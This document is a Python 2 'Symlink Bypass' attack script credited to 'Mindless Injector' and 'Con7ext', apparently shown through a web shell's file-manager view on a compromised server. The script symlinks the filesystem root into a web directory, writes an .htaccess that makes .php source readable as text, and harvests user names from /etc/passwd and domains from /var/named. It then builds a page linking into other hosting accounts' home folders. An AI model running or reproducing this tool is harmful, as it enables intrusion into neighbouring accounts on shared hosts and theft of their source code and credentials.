Current Path : /var/www/html/social/ProfileThumb/Thumb/con7ext_sympy/
Upload File :
Current File : /var/www/html/social/ProfileThumb/Thumb/con7ext_sympy/sym.py

#/*Python

import time
import os
import sys
import re

os.system("color C")

hta = "\nFile : .htaccess // Created Successfully!\n"
f = "All Processes Done!\nSymlink Bypassed Successfully!\n"
print "\n"
print "~"*60
print "Symlink Bypass 2014 by Mindless Injector "
print "              Special Greetz to : Pak Cyber Skullz"
print "~"*60

os.makedirs('brudulsympy')
os.chdir('brudulsympy')

susr=[]
sitex=[]
os.system("ln -s / brudul.txt")

h = "Options Indexes FollowSymLinks\nDirectoryIndex brudul.phtml\nAddType txt .php\nAddHandler txt .php"
m = open(".htaccess","w+")
m.write(h)
m.close()
print hta

sf = "<html><title>Symlink Python</title><center><font color=white size=5>Symlink Bypass 2017<br><font size=4>Made By Mindless Injector <br>Recoded By Con7ext</font></font><br><font color=white size=3><table>"

o = open('/etc/passwd','r')
o=o.read()
o = re.findall('/home/\w+',o)

for xusr in o:
	xusr=xusr.replace('/home/','')
	susr.append(xusr)
print "-"*30
xsite = os.listdir("/var/named")

for xxsite in xsite:
	xxsite=xxsite.replace(".db","")
	sitex.append(xxsite)
print f
path=os.getcwd()
if "/public_html/" in path:
	path="/public_html/"
else:
	path = "/html/"
counter=1
ips=open("brudul.phtml","w")
ips.write(sf)

for fusr in susr:
	for fsite in sitex:
		fu=fusr[0:5]
		s=fsite[0:5]
		if fu==s:
			ips.write("<body bgcolor=black><tr><td style=font-family:calibri;font-weight:bold;color:white;>%s</td><td style=font-family:calibri;font-weight:bold;color:red;>%s</td><td style=font-family:calibri;font-weight:bold;><a href=brudul.txt/home/%s%s target=_blank >%s</a></td>"%(counter,fusr,fusr,path,fsite))
			counter=counter+1

,